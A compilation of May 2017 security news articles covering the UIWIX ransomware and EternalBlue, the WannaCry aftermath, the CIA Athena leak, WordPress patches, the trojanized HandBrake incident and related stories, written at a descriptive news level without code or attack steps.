The effects of the militarization of the cyberspace are dangerous and unpredictable. A malicious code developed by a government could create serious problems for the Internet users, the recent WannaCry massive attack demonstrates it that used the EternalBlue Exploit to spread.

Now a new ransomware, dubbed UIWIX, was discovered to be using the NSA-linked EternalBlue exploit for distribution.

UIWIX is a fileless malware discovered by experts at Heimdal security early this week while investigating on WannaCry.

Like the WannaCry, UIWIX exploits the same vulnerability in Windows SMB protocol, but the new threat has the ability to run in the memory of the infected system after the exploiting of the EternalBlue.

“As we feared in yesterday’s alert, another ransomware variant, known as Uiwix, has been spotted in the wild, exploiting the same vulnerability in Windows SMBv1 and SMBv2 as WannaCry used. Cyber criminals are quick to incorporate vulnerabilities, especially when they have the potential to infect a large number of targets like the EternalBlue exploit has.” reads the analysis published by Heimdal Security.

Malware researchers at Trend Micro also investigated the UIWIX and confirmed that UIWIX is a stealthier threat that is hard to analyze, it doesn’t write files on the infected machine and it is also able to detect the presence of a virtual machine (VM) or sandbox.

“So how is UIWIX different? It appears to be fileless: UIWIX is executed in memory after exploiting EternalBlue. Fileless infections don’t entail writing actual files/components to the computer’s disks, which greatly reduces its footprint and in turn makes detection trickier.” wrote Trend Micro.

“UIWIX is also stealthier, opting to terminate itself if it detects the presence of a virtual machine (VM) or sandbox. Based on UIWIX’s code strings, it appears to have routines capable of gathering the infected system’s browser login, File Transfer Protocol (FTP), email, and messenger credentials.”

UIWIX is able to browser login, File Transfer Protocol (FTP), email, and messenger credentials from the infected system,

Unlike WannaCry, UIWIX leverages a Dynamic-link Library (DLL) to gain persistence.

Below a summary of WannaCry and UIWIX’s notable features reported by Trend Micro:

WannaCry UIWIX
Attack Vectors SMB vulnerabilities (MS17-010), TCP port 445 SMB vulnerabilities (MS17-010), TCP port 445
File Type Executable (EXE) Dynamic-link Library (DLL)
Appended extension {original filename}.WNCRY ._{unique id}.UIWIX
Autostart and persistence mechanisms Registry None
Anti-VM, VM check, or anti-sandbox routines None Checks presence of VM and sandbox-related files or folders
Network activity On the internet, scans for random IP addresses to check if it has an open port 445; connects to .onion site using Tor browser Uses mini-tor.dll to connect to .onion site
Exceptions (doesn’t execute if it detects certain system components) None Terminates itself if found running in Russia, Kazakhstan, and Belarus
Exclusions (directories or file types it doesn’t encrypt) Avoids encrypting files in certain directories Avoids encrypting files in two directories, and files with certain strings in their file name
Network scanning and propagation Yes (worm-like propagation) No
Kill switch Yes No
Autostart and persistence mechanisms Registry None
Number of targeted file types 176 All files in the affected system except those in its exclusion list
Shadow copies deletion Yes No
Languages supported (ransom notes, payment site) Multilingual (27) English only
UIWIX malware

Another interesting behavior observed by the researchers is that the malware terminates itself if the compromised computer is located in Russia, Kazakhstan, and Belarus.

The network activity of the malware leverages mini-tor.dll to connect to .onion site, meanwhile, WannaCry was scanning the Internet for random IP addresses to check if it has an open port 445 and it was connecting to .onion site using the Tor browser.

Most evident differences between WannaCry and UIWIX are:

UIWIX doesn’t implement the worm spreading capabilities;
UIWIX doesn’t include a kill-switch;
UIWIX uses a different Bitcoin address for each victim;
Clearly, the WannaCry attack represents a great opportunity for cyber crime ecosystem, every time a new flaw was discovered cooks try to exploit is in the attack in the wild, for example including the exploit code in crimeware kits used in hacking campaigns.

Recently we reported the case of the Adylkuzz botnet, another malware that exploited the EternalBlue exploit to spread a Monero miner.

“It’s not a surprise that WannaCry’s massive impact turned the attention of other cybercriminals into using the same attack surface vulnerable systems and networks are exposed to. Apart from WannaCry and UIWIX, our sensors also detected a Trojan delivered using EternalBlue—Adylkuzz (TROJ_COINMINER.WN). This malware turns infected systems into zombies and steals its resources in order to mine for the cryptocurrency Monero.” Trend Micro concludes.

“UIWIX, like many other threats that exploit security gaps, is a lesson on the real-life significance of patching.”


WikiLeaks revealed CIA Athena Spyware, the malware that targets all Windows versions
20.5.2017 securityaffairs BigBrothers

Wikileaks released the documentation for the Athena Spyware, a malware that could infect and remote control almost any Windows machine.
Last Friday, Wikileaks released the documentation for AfterMidnight and Assassin malware platforms, today the organization leaked a new batch of the CIA Vault 7 dump that includes the documentation related to a spyware framework dubbed Dubbed Athena /Hera.

The batch of CIA files includes a user manual of the Athena platform, an overview of the technology, and a demo on how to use the malware.

Reading the documents it is possible to discover that any Windows systems could be infected by the two spyware, Athena works for XP through Windows 10 and Hera for Windows 8 through Windows 10.

The Athena / Hera malware were used by the CIA to take remote control over the infected Windows machines remotely.
“The Athena System fulfills COG/NOD’s need for a remote beacon/loader. Table 2 shows the system components available in Athena/Hera v1.0. The target computer operating systems are Windows XP Pro SP3 32-bit (Athena only), Windows 7 32-bit/64-bit, Windows 8.1 32- bit/64-bit, Windows 2008 Enterprise Server, Windows 2012 Server, and Windows 10.” reads the system overview included in the user guide. “Ubuntu v14.04 is the validated Linux version. Apache 2.4 is the validated web server for the Listening Post.”

The Athena spyware was written in Python, is seems to be dated back August 2015, if confirmed it is worrying news because Microsoft released Windows 10 in July 2015.

Athena is the result of a joint work of CIA developers and peers at cyber security firm Siege Technologies that is specialized in offensive cyber security.

“Athena is a beacon loader developed with Siege Technologies. At the core it is a very simple implant application. It runs in user space and beacons from the srvhost process. The following diagram shows the concept of operation.” states the Athena Technology Overview.

CIA Athena spyware

The documents leaked by Wikileaks reveals that ability of the Athena spyware to modify its configuration in real time, customizing it to a specific operation.

“Once installed, the malware provides a beaconing capability (including configuration and task handling), the memory loading/unloading of malicious payloads for specific tasks and the delivery and retrieval of files to/from a specified directory on the target system,” WikiLeaks claims.

However, WikiLeaks has not provided any detail about the operations being conducted by the agency using Athena, but it is not hard to imagine how the intelligence agency would be using this program to spy on their targets.

Below the list of the mail dumps leaked by WikiLeaks:

The Year Zero that revealed CIA hacking exploits for hardware and software.
Weeping Angel spying tool to hack Samsung smart TV and use them as
The Dark Matter dump is containing iPhone and Mac hacking exploits.
The Marble batch focused on a framework used by the CIA to make hard the attribution of cyber attacks.
The Grasshopper batch that reveals a framework to customize malware for breaking into Microsoft’s Windows and bypassing antivirus protection.
The Scribbles Project for document tracking.
Archimedes man-in-the-middle (MitM) attack tool.
AfterMidnight and Assassin malware platforms.


North Korea Denies Role in Global Cyberattack

20.5.2017 securityweek Attack
North Korea on Friday angrily dismissed reports linking its isolated regime to the global cyberattack that held thousands of computers to virtual ransom.

Up to 300,000 computers in 150 countries were hit by the WannaCry worm, which seizes systems and demands payment in Bitcoin to return control to users.

The code used in the latest attack is similar to that used in past hacks blamed on Kim Jong-Un's regime, leading some to point the finger at Pyongyang.

But the North has now denied the claims, notably but not exclusively advanced by South Korean experts, and hit back Friday to accuse its opponents of spreading propaganda.

"It is ridiculous," Kim In-Ryong, North Korea's deputy ambassador to the United Nations, told reporters, suggesting Washington and Seoul were behind the allegation.

"Whenever something strange happens, it is the stereotyped way of the United States and the hostile forces to kick off a noisy anti-DPRK campaign."

Related: WannaCry Doesn't Fit North Korea's Style, Interests, Experts Say

Seoul internet security firm Hauri, known for its vast troves of data on Pyongyang's hacking activities, has been warning of ransomware attacks since last year.

The firm's Simon Choi told AFP that the WannaCry malware shares code with tools used to target Sony Pictures and Bangladesh, in previous attacks blamed on the North.

Researchers in the US, Russia and Israel have also pointed to a potential North Korean link -- but it is notoriously hard to attribute cyberattacks.

Google researcher Neel Mehta has shown similarities between WannaCry and code used by the Lazarus hacking group, widely believed to be connected to Pyongyang.


Google Launches Security Services for Android

20.5.2017 securityweek Android
Google this week launched a set of security services designed to bring improved protection and visibility for Android users.

Dubbed Google Play Protect, the new product is built into all devices with Google Play and should provide “comprehensive security services for Android,” the Internet giant says.

“Whether you’re checking email for work, playing Pokémon Go with your kids or watching your favorite movie, confidence in the security of your device and data is important,” Edward Cunningham, Product Manager, Android Security, notes.

“We know you want to be confident that your Android devices are safe and secure, which is why we are doubling down on our commitment to security,” he continues.

There are 2 billion active Android devices globally and Google performs more than 50 billion application scans every day to keep them safe.

With the help of machine learning, Google says it can discover new risks, identify potentially harmful apps, and either protect devices from them or remove them where they have been already installed.

Google is also rigorously analyzing all apps before publishing them on the Play Store, though it isn’t unheard of malicious programs that slip into the marketplace and infect users by the millions.

According to Cunningham, Play Protect can warn about bad apps downloaded from other sources as well. It is meant to keep an eye on all applications that perform nefarious operations on a device, in an attempt to keep users’ data safe.

One of the features included in Google Play Protect is Find My Device, which is meant to help users even when they lose their devices.

“With Find My Device you can locate, ring, lock and erase your Android devices—phones, tablets, and even watches. This feature is built in and enabled on all devices,” Cunningham notes.

Users interested in learning more on this application should head to android.com/find or simply check the Find My Device app.

The new features will be rolling out to Android devices over the coming weeks.

Numerous infected applications were found in Google Play this year, ranging from fake system updates to mobile games, utility programs, and fake versions of popular streaming apps. In June last year, malicious versions of Pokémon GO landed in the storefront.


Disney Blackmailed Over Apparent Movie Hack: Reports

20.5.2017 securityweek Hacking
Disney chief Bob Iger said Monday hackers claiming to have access to one of the company's unreleased movies were demanding a "huge" ransom, according to US media reports.

He did not reveal which film had been stolen but said the company would not be giving in to the blackmail attempt, according to The Hollywood Reporter, quoting Iger from a meeting in New York with employees of the Disney-owned ABC television network.

The weekly reported on its website -- citing multiple unnamed sources -- that Disney is working with federal agents and monitoring for leaks online.

Movie website Deadline identified "Pirates of the Caribbean: Dead Men Tell No Tales," which opens on May 26, as the target, without revealing its sources, while some film writers speculated on Twitter that Pixar's "Cars 3," due for release next month, might have been hit.

Although both films are expected to do well for Disney, their profits are likely to be dwarfed by another film on the company's slate -- "Star Wars: The Last Jedi," which hits theaters on December 15.

"IMO, if it were 'Last Jedi,' he would pay in a heartbeat. But 'Pirates'... meh," Ryan Parker, a staff writer on the Hollywood Reporter, speculated on Twitter.

The cyber-thieves demanded to be paid in online currency Bitcoin and are threatening to release five minutes of the movie, followed by 20-minute segments until the ransom is delivered.

The hack follows a recent cyber attack on internet streamer Netflix that led to 10 episodes of "Orange is the New Black" being leaked ahead of release.

"Dead Men Tell No Tales" is the fifth in the "Pirates of the Caribbean" series, which stars Johnny Depp and has taken $3.7 billion at the box office since 2003.

Sci-fi novelist Paul Tassi, who comments on technology and the internet for Forbes Magazine, said "Pirates" would be unlikely to suffer were it the target, since its release date is so near.

"Yes, going to a movie in theaters is one of the more exhausting media experiences still left in society, but the kinds of people who are willing to pay money to see Johnny Depp stumble his way through a fifth 'Pirates of the Caribbean' movie in theaters are probably not the type to download a stolen copy of it right before it comes out," he said.

"And like all movies, 'Pirates' would appear on torrent sites regardless practically the day of its release, so the hackers seem to be really over-estimating their impact here."

More than 200,000 computers in 150 countries were hit by a ransomware cyberattack, described as the largest-ever of its kind, over the weekend.

Since Friday, banks, hospitals and government agencies have been among a variety of targets for hackers exploiting vulnerabilities in older Microsoft computer operating systems.

Microsoft president Brad Smith said the US National Security Agency had developed the code used in the attack.

The Walt Disney Company didn't respond to requests for comment.


Fileless Ransomware Spreads via EternalBlue Exploit

20.5.2017 securityweek Ransomware
A newly discovered ransomware family was found to be using the NSA-linked EternalBlue exploit for distribution and is capable of fileless infection, researchers have discovered.

Dubbed UIWIX, the malware was initially spotted on Monday, when the WannaCry outbreak was in the spotlight. The threat spreads by exploiting the same vulnerability in Windows SMBv1 and SMBv2 that WannaCry does.

Unlike WannaCry, UIWIX is executed in memory after exploiting EternalBlue, with no files or components being written to disk. This “greatly reduces its footprint and in turn makes detection trickier,” Trend Micro explains.

Furthermore, the security researchers say this ransomware family is also stealthier, containing code that allows it to terminate itself if a virtual machine (VM) or sandbox is detected. UIWIX also contains code that gathers the infected system’s browser login, File Transfer Protocol (FTP), email, and messenger credentials.

Unlike WannaCry, UIWIX doesn’t use autostart and persistence mechanisms, is distributed in the form of a Dynamic-link Library (DLL). Interestingly, the malware terminates itself if the compromised computer is located in Russia, Kazakhstan, and Belarus, and uses mini-tor.dll to connect to an .onion site.

UIWIX doesn’t have the worm spreading capabilities either, doesn’t include a kill-switch, and uses a different Bitcoin address for each victim it infects. When accessed, a URL in the ransom note ask for a “personal code” that is included in the ransom note and prompts the user to sign up for a Bitcoin wallet if they don’t have one.

“It’s not a surprise that WannaCry’s massive impact turned the attention of other cybercriminals into using the same attack surface vulnerable systems and networks are exposed to,” Trend Micro notes.

Before WannaCry and UIWIX, however, the EternalBlue exploit was leveraged by the Adylkuzz botnet, which abuses infected systems to mine for the cryptocurrency Monero.

Already ported to Metasploit, EternalBlue is one of the exploits released by the hacker group known as The Shadow Brokers after allegedly stealing it from the National Security Agengy-linked Equation Group. Microsoft patched the targeted vulnerability before the exploit’s public release, and also issued an emergency patch for older platform versions.

“UIWIX, like many other threats that exploit security gaps, is a lesson on the real-life significance of patching. Enterprises must balance how it sustains the efficiency of [their] business operations while also safeguarding them. IT/system administrators and information security professionals, their sentry, should enforce strong baselines that can mitigate attacks that threaten the integrity and security of their systems and networks,” Trend Micro concludes.


Financial Firms Struggle on Compliance for non-Email Communications

20.5.2017 securityweek Security
Financial services is perhaps the most regulated sector in industry. SEC, FINRA and Gramm-Leach-Bliley are merely the better known of a raft of regulations. Key to all of them is the requirement to manage and retain communications. But just as regulations tend to increase and become more complex, so too have the different methods of communication that need to be monitored ballooned. What was once just email now includes SMS, public IM, a variety of social media and more. At the same time, regulators are becoming more active.

The 2017 Electronic Communications Compliance Survey (PDF) from Smarsh demonstrates continuing industry concern over its ability to capture and retain relevant staff communications, especially from mobile devices. Interestingly, Europe's GDPR will add to the regulation mix, but will expand the industry coverage from finserv to any organization doing business with Europe. While finserv regulations are concerned with financial data in communications, GDPR is concerned with personal data in communications. Different detail, but same basic problem: the control of regulated data getting dispersed in uncontrolled communications.

The problem is the same. So it follows that the difficulties and concerns voiced by finserv organizations over communications compliance will apply to all industry sectors by the end of May 2018.

Smarsh surveyed 119 finserv individuals in compliance supervisory roles ranging from c-level to operations. It found that the top three concerns for regulatory compliance are non-email communications, mobile devices, and simply understanding new and challenging regulations. In each case, the level of concern has increased dramatically over 2016 levels.

Non-email and mobile device communications overlap. Employees are increasingly using personal devices for non-email quick communication with customers, potential customers, colleagues and friends. Text/SMS messaging is considered to pose the greatest compliance risk (52% of respondents). Noticeably, in December 2016 FINRA fined a Georgia firm $1.5 million partly for failure to retain approximately one million text messages sent using firm-issued devices.

All of this is against a backdrop of more frequent, deeper and broader regulatory examinations. In 2015, 27% of firms were examined in a 12-month period; in 2016 it was 42%; and in 2017 it rose to 47%. The biggest single change in the examinations has been the regulators' increasing requests for social media communications. In 2015, 19% of examiners requested social media comms -- but by 2017, this had increased to 44% for LinkedIn, 27% for Facebook, 21% for Twitter, and 6% for Instagram.

The examiners are also looking at firms' mobile communication policies. In the last year, 21% of the examined respondents had to provide their mobile device communications policy. Policy, however, has its own issues. Of those firms that allow text/SMS messaging, 36% do not have a written policy governing its use. Smarsh suggests, however, that any firm not supervising mobile use should now expect to be fined.

The problem for business is that mobile communications is not a risk that can be avoided. "Firms need to leverage new and emerging channels to communicate with their customers and stay competitive, but they're failing to manage the risk," explains Stephen Marsh, CEO and founder of Smarsh.

Simple prohibition is not a solution. Where it is used, survey respondents' confidence in its effectiveness is low. Asked if they would be able to prove that prohibition is working, the confidence gap over text/SMS, and also LinkedIn, stands at 67%. For Twitter it is 57%, and for public IM it is 55%.

"This year's survey," comments CEO Stephen Smarsh, "reinforces that policies of prohibition are a barrier to growing business and workforce productivity. They do not deliver compliance confidence, and they simply don't work. Early 2017 examples of text-related firm penalties all have one thing in common: all prohibited its use for business communication. More than two thirds (67 percent) of respondents have no or minimal confidence that they could prove their prohibition of text messaging is actually working."

There is a bonus. While compliance is the primary driver for communications archiving and supervision, 88% of the respondents recognize that communications data can also help identify more general security risks to the organization. "More than half of respondents (59%)," notes the report, "confirm that their organization uses this data to identify fraudulent activity, among other purposes, such as supporting e-discovery and HR issues, and detecting market abuse."

It is worth stressing that the 2017 Smarsh survey relates directly to compliance in the financial services industry. The arrival of the General Data Protection Regulation in May 2018 will create the same basic communications content compliance requirements across all industries. In preparing for GDPR, all industry sectors can learn from the non-email communications compliance problems already being experienced by Finserv.


Number of Phishing Sites Using HTTPS Soars

19.5.2017 securityweek Phishing
The number of phishing websites using HTTPS has increased considerably over the past few months since Firefox and Chrome have started warning users when they access login pages that are not secure.

Internet security services firm Netcraft reported on Wednesday that, since late January, the proportion of phishing sites using HTTPS increased from roughly 5% to 15%.

One explanation for the rise is that, in late January, both Google and Mozilla implemented HTTP warnings in their Chrome and Firefox web browsers in an effort to protect their customers against man-in-the-middle (MitM) attacks.

Users of Chrome 56 and later, and Firefox 51 and later are warned when they are about to enter their credentials on a login page that does not use HTTPS. Since most phishing sites had been served over HTTP connections, cybercriminals may have realized that they need to step up their game and move to HTTPS.

“If the new browser behaviour has driven this change — and the timing suggests it might have — then it may have also had the unintended side effect of increasing the efficacy of some phishing sites,” explained Netcraft’s Paul Mutton. “Phishing sites that now use HTTPS and valid third-party certificates can appear more legitimate, and therefore increase the likelihood of snaring a victim.”

Phishing sites using HTTPS

Another possible explanation, according to the expert, is that the warnings introduced by Google and Mozilla encouraged website administrators to migrate to HTTPS. Since phishing pages are often hosted on legitimate sites that have been compromised, this may have also been a factor in the significant increase of phishing sites using HTTPS.

On the other hand, Mutton pointed out that some popular browsers, such as Microsoft’s Edge and Internet Explorer, don’t display any warnings for login pages, which means phishing sites served over HTTP will still be efficient in many cases.

Cybercriminals have been coming up with clever ways to phish users’ credentials. One recent campaign aimed at Google customers leveraged a fake Google Docs application. Google quickly killed the operation, but the incident showed that malicious actors continue to improve their methods.


Medical Devices Infected With WannaCry Ransomware

19.5.2017 securityweek Ransomware
WannaCry ransomware on medical devices

Several medical device manufacturers released security advisories this week following reports that the notorious WannaCry ransomware has infected some medical devices.

The WannaCry ransomware, also known as Wanna Decryptor, WanaCrypt0r, WannaCrypt, Wana Decrypt0r and WCry, leverages a couple of exploits allegedly developed by the NSA and leaked recently by a hacker group called Shadow Brokers. The threat has hit hundreds of thousands of systems worldwide, including ones housed by banks, hospitals, ISPs, government agencies, transportation companies and manufacturing plants.

Britain’s National Health Service (NHS) was among the worst hit by the malicious campaign, and the incident clearly showed the risk posed by WannaCry to healthcare organizations. However, initial reports suggested that the malware had mainly affected management systems.

The U.S.-based Health Information Trust Alliance (HITRUST) later reported seeing evidence of Bayer (Medrad), Siemens and other medical devices getting infected with WannaCry. Bayer confirmed for Forbes that two of its customers in the United States had informed it about ransomware infections.

Since many medical devices run on Windows and they are connected to the local network, they can easily get infected with WannaCry.

ICS-CERT has provided a list of vendors that have released security advisories to warn customers of the risks and provide them with recommendations on how to prevent attacks.

The list includes Rockwell Automation, BD (Becton, Dickinson and Company), Schneider Electric, ABB, Siemens, General Electric, Philips, Smiths Medical, Johnson & Johnson, and Medtronic. Some of these vendors have also issued warnings about the threat posed to their industrial products.

Related: Industry Reactions to WannaCry Ransomware Attacks

BD has published a list of tens of potentially vulnerable devices and provided recommendations for securing Windows-based systems. Siemens has released separate advisories for each affected Healthineers product, including magnetic resonance, laboratory diagnostics, tomography, radiography, X-ray, mammography, molecular diagnostics, and molecular imaging devices.

Siemens says it’s working on updates that will patch Server Message Block (SMB) vulnerabilities in affected products, and shared some countermeasures until fixes become available. WannaCry exploits one particular SMB vulnerability patched by Microsoft in March, but the fix for this flaw also addresses several other SMB weaknesses.

Other medical device vendors have not listed affected products, but warned customers that all Windows-based systems are at risk. Some highlighted that they had not been aware of any incidents involving their products.

“The WannaCry medical device infections show that data isn’t the only digital asset being targeted. They further demonstrate that if these devices can be impacted, so too can mission-critical infrastructures, industrial IoT devices and control systems. When one of these targets falls prey to ransomware, the outcome could be catastrophic — measured in terms of human injury and lives as opposed to just a few bitcoins,” said Dean Weber, CTO of industrial IoT security provider Mocana.

“IT, OT and security professionals in hospitals and other mission critical environments should act immediately to patch systems, especially those running Windows. They should also consider taking proactive steps that could include adding multi-factor authentication, stronger encryption and embedding security directly into devices to establish more effective trust,” Weber concluded.


Stegano Exploit Kit Adopts the Diffie-Hellman Algorithm

19.5.2017 securityweek Exploit
After receiving multiple updates, the Stegano exploit kit (EK) recently adopted the Diffie-Hellman algorithm to hinder analysis, Trend Micro security researchers warn.

Also known as Astrum, Stegano was previously associated with a massive AdGholas malvertising campaign that delivered Trojans such as Gozi and RAMNIT. The EK was also seen being used in the Seamless malvertising campaign, which normally employs RIG instead.

In late March, Proofpoint security researcher Kafeine discovered the EK abusing CVE-2017-0022, an information disclosure vulnerability in Windows that was patched on March 14. The exploit was used to look for antivirus apps on the system to evade detection and analysis.

In April, the threat received an update that prevented security researchers from replaying the malicious network traffic. The feature abuses the Diffie-Hellman algorithm, which is widely used for encrypting and securing network protocols.

“Implementing the Diffie-Hellman key exchange prevents malware analysts and security researchers from getting a hold of the secret key Astrum uses to encrypt and decrypt their payloads. Consequently, obtaining the original payload by solely capturing its network traffic can be very difficult,” Trend Micro notes.

In addition to the CVE-2017-0022 flaw, Astrum/Stegano is using exploits for a series of vulnerabilities in Adobe Flash, including CVE-2015-8651 (a code execution vulnerability patched December 28, 2015), CVE-2016-1019 (a remote code execution flaw patched April 7, 2016), and CVE-2016-4117 (an out-of-bound read bug in Flash patched May 10, 2016).

At the moment, the EK isn’t distributing established malware, and the threat is maintaining very low traffic, which Trend Micro believes can be seen as dry runs for their future attacks.

“It wouldn’t be a surprise if [Astrum/Stegano’s] operators turn it into an exclusive tool of the trade—like Magnitude and Neutrino did—or go beyond leveraging security flaws in Adobe Flash. Emulating capabilities from its predecessors such as fileless infections that can fingerprint its targets and deliver encrypted payloads shouldn’t be far off,” the researchers note.


WordPress 4.7.5 release addresses six security vulnerabilities
19.5.2017 securityaffairs Vulnerebility

The new WordPress 4.7.5 release fixes six security vulnerabilities affecting version 4.7.4 and earlier, including XSS, CSRF, SSRF flaws.
The WordPress 4.7.5 release patches six vulnerabilities affecting version 4.7.4 and earlier. The latest version addresses cross-site scripting (XSS), cross-site request forgery (CSRF), and server-side request forgery (SSRF) flaws.

Below the list of the security issues fixed with the last update:

Insufficient redirect validation in the HTTP class. Reported by Ronni Skansing.
Improper handling of post meta data values in the XML-RPC API. Reported by Sam Thomas.
Lack of capability checks for post meta data in the XML-RPC API. Reported by Ben Bidner of the WordPress Security Team.
A Cross Site Request Forgery (CSRF) vulnerability was discovered in the filesystem credentials dialog. Reported by Yorick Koster.
A cross-site scripting (XSS) vulnerability was discovered when attempting to upload very large files. Reported by Ronni Skansing.
A cross-site scripting (XSS) vulnerability was discovered related to the Customizer. Reported by Weston Ruter of the WordPress Security Team.
Let’s go into the details of the flaw fixed by the in the details of the flaw fixed by the WordPress 4.7.5 release:

The CSRF flaw patched was reported by the Securify researcher Yorick Koster in the summer of 2016 during the WordPress hacking competition.

It affects the WordPress version 4.5.3 up till and including version 4.7.4.

“The FTP/SSH form functionality of WordPress was found to be vulnerable to Cross-Site Request Forgery.” ” states the advisory published by the company. “This vulnerability can be used to overwrite the FTP or SSH connection settings of the affected WordPress site. An attacker can use this issue to trick an Administrator into logging into the attacker’s FTP or SSH server, disclosing his/her login credentials to the attacker. In order to exploit this vulnerability, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.”

The SSRF vulnerability, tracked as CVE-2017-9066, was discovered by the researcher Ronni Skansing, who plans to release a PoC code soon.

12h
Ryan St. Germain @r_stgermain
@skansing Any POC availability?
Follow
Ronni Skansing @skansing
@r_stgermain It will be available at https://hackerone.com/reports/187520 when the report has been fully processed by wp staff, I can request disclosure on the report
2:53 AM - 19 May 2017
Retweets likes
Twitter Ads info & Privacy
Skansing was reported another vulnerability in WordPress, XSS flaw related to uploading very large files.

This isn’t the unique XSS vulnerability fixed, another cross-site-scripting has been reported by Weston Ruter of the WordPress security team in the Customizer feature.

The WordPress 4.7.5 release also patches different vulnerabilities in the same API, such as the Lack of capability checks for post meta data in the XML-RPC API.

WordPress also announced the launch of a public bug bounty program that aims to involve hacking community on the WordPress CMS, BuddyPress, bbPress and GlotPress.

The program will also cover the WordPress.org, WordCamp.org, BuddyPress.org, WordPress.tv, bbPress.org and Jobs.WordPress.net websites.


Code Stolen After Developer Installed Trojanized App

19.5.2017 Securityweek Virus

In a perfect example of how a breach could have an unexpected impact, application builder Panic on Wednesday announced that it experienced source code theft after a developer unknowingly installed a Trojanized application in early May.

The specific app was HandBrake, a video converting tool that experienced a breach in early May, when one of its download mirror servers was compromised and configured to distribute a remote administration Trojan (RAT) for Mac computers.

After discovering the incident, HandBrake posted a security alert on its website, informing users that those who downloaded the application between May 2 and May 6 might have been infected. Only the download mirror at download.handbrake.fr had been compromised, but all users were advised to verify their installation.

One of those who downloaded the Trojanized HandBrake variant was Steven Frank, the founder of Panic, a company that creates software for Macs, iPhones, and iPads. Because of that, attackers gained access to source code repositories and cloned them.

This resulted in attackers gaining access to some of the company’s source code repos. After investigating the incident, Panic discovered that the method the attackers used to clone the source code prevented them from stealing all of the repositories.

The developers also received an email from the attackers, who informed them they would release the source code online if a large Bitcoin ransom wasn’t paid. The company, however, decided against paying, as this wouldn’t guarantee the attackers would keep their end of the bargain.

“This hack hasn’t slowed us down. That source is already missing a ton of fixes and improvements we committed over the last week alone, and six months from now it will be missing major critical new features. In short: it’s old and getting older,” Frank says.

Immediately after discovering the hack, Panic contacted Apple and the FBI, and the former has even helped them roll their Developer ID and invalidate the old one, although it wasn’t believed to have been compromised.

Furthermore, the company also notes that they have no indication of customer information being accessed in the hack, nor indication that Panic Sync (a “secure service to keep your Panic data in sync across all your apps and devices”) data was accessed. The company’s web server wasn’t compromised either, it seems.

“As soon as I discovered the infection on my Mac, I disabled it, took the Mac out of commission, and we began the incredibly lengthy process of changing all of my passwords, rotating the relevant secret keys throughout our infrastructure, and so on, to re-lock our doors and hopefully prevent anything else from being stolen,” Frank explains.

This incident shows that repackaged versions of legitimate apps can fly under the radar and cause significant damage, especially if the user doesn’t pay attention to the permissions requested during the installation process.

“So, I managed to download within the three day window during which the infection was unknown, managed to hit the one download mirror that was compromised, managed to run it and breeze right through an in-retrospect-sketchy authentication dialog, without stopping to wonder why HandBrake would need admin privileges, or why it would suddenly need them when it hadn’t before. I also likely bypassed the Gatekeeper warning without even thinking about it, because I run a handful of apps that are still not signed by their developers. And that was that, my Mac was completely, entirely compromised in 3 seconds or less,” Frank notes.


Microsoft Withheld Update That Could Have Slowed WannaCry: Report

19.5.2017 Securityweek Ransomware

American software giant Microsoft held back from distributing a free security update that could have protected computers from the WannaCry global cyber attack, the Financial Times reported Thursday.

In mid-march, Microsoft distributed a security update after it detected the security flaw in its XP operating system that enabled the so-called WannaCry ransomware to infiltrate and freeze computers last week.

But the software giant only sent the free security update -- or patch -- to users of the most recent version of the Windows 10 operating system, the report said.

Users of older software, such as Windows XP, had to pay hefty fees for technical support, it added.

"The high price highlights the quandary the world's biggest software company faces as it tries to force customers to move to newer and more secure software," it said.

A Microsoft spokesperson based in the United States told AFP: "Microsoft offers custom support agreements as a stopgap measure" for companies that choose not to upgrade their systems.

"To be clear, Microsoft would prefer that companies upgrade and realise the full benefits of the latest version rather than choose custom support."

According to the FT, the cost of updating older Windows versions "went from $200 per device in 2014, when regular support for XP ended, to $400 the following year," while some clients were asked to pay heftier fees.

The newspaper argued the high costs led Britain's National Health Service -- one of the first victims of the WannaCry attack -- to not proceed with updates.

Microsoft ended up distributing the free patch for the older versions on Friday -- the day the ransomware was detected.

Although the announcement was "too late to contain the WannaCry outbreak," the report said.

Microsoft did not confirm to AFP when it made the patch free.

A hacking group called Shadow Brokers released the malware in April claiming to have discovered the flaw from the NSA, according to Kaspersky Lab, a Russian cybersecurity provider. jc-at/har MICROSOFT


Wanadecrypt allows to recover files from Windows XP PCs infected by WannaCry without paying ransom
19.5.2017 Securityweek Ransomware

A security researcher developed a tool called wanadecrypt to restore encrypted files from Windows XP PCs infected by the WannaCry ransomware.
The WannaCry ransomware made the headlines with the massive attack that hit systems worldwide during the weekend.

The malicious code infected more than 200,000 computers across 150 countries in a matter of hours, it leverages the Windows SMB exploit Eternal Blue to compromise unpatched OS or computers running unsupported versions of Windows OS.

Microsoft took the unprecedented decision to issue security patches for Windows 2003 server and XP in order to protect its customers.

Now there is a good news for the owners of some computers running Windows XP that was infected by the WannaCry ransomware, they may be able to decrypt their data without paying the ransom ($300 to $600).

Wanadecrypt WannaCrypt ransomware

The Quarkslab researcher, Adrien Guinet, has published a software, called Wanadecrypt, he used to recover the decryption key required to restore the files on an infected XP computer. The expert successfully tested the Wanadecrypt software on a small number of infected XP computers, but it is not clear if the technique works on every PC.

Experts downplayed the discovery because Windows XP computers weren’t affected by the massive WannaCry attack. Still, but the Guinet’s method could be helpful to XP users hit in other attacks.


Adrien Guinet @adriengnt
I got to finish the full decryption process, but I confirm that, in this case, the private key can recovered on an XP system #wannacry!!
1:34 PM - 18 May 2017
1,026 1,026 Retweets 1,281 1,281 likes
Twitter Ads info & Privacy
“This software has only been tested and known to work under Windows XP,” he wrote in a readme note issued with the software. “In order to work, your computer must not have been rebooted after being infected. Please also note that you need some luck for this to work (see below), and so it might not work in every case!”

Another popular expert, Matt Suiche, reported he was not able to use the WannaKey tool.

16h
Matthieu Suiche ✔ @msuiche
@adriengnt @gentilkiwi Do you support the same format yet Adrien ? Trying now.
Follow
Matthieu Suiche ✔ @msuiche
@adriengnt @gentilkiwi Missing something ? pic.twitter.com/9Fe12WzmrQ
7:08 PM - 18 May 2017

Retweets likes
Twitter Ads info & Privacy
The WannaCry ransomware uses the Microsoft Cryptographic Application Program Interface included with Windows to implements most of its encryption features.

Once created the key, the interface erases the key on most versions of Windows, but experts discovered that a limitation on Windows XP OS can prevent this operation.

This implies that the prime numbers used in the WannaCry Key generation may remain in the memory of the machine until it is powered down allowing Wanadecrypt to extract it from the infected XP.

“If you are lucky (that is the associated memory hasn’t been reallocated and erased), these prime numbers might still be in memory,” Guinet wrote.

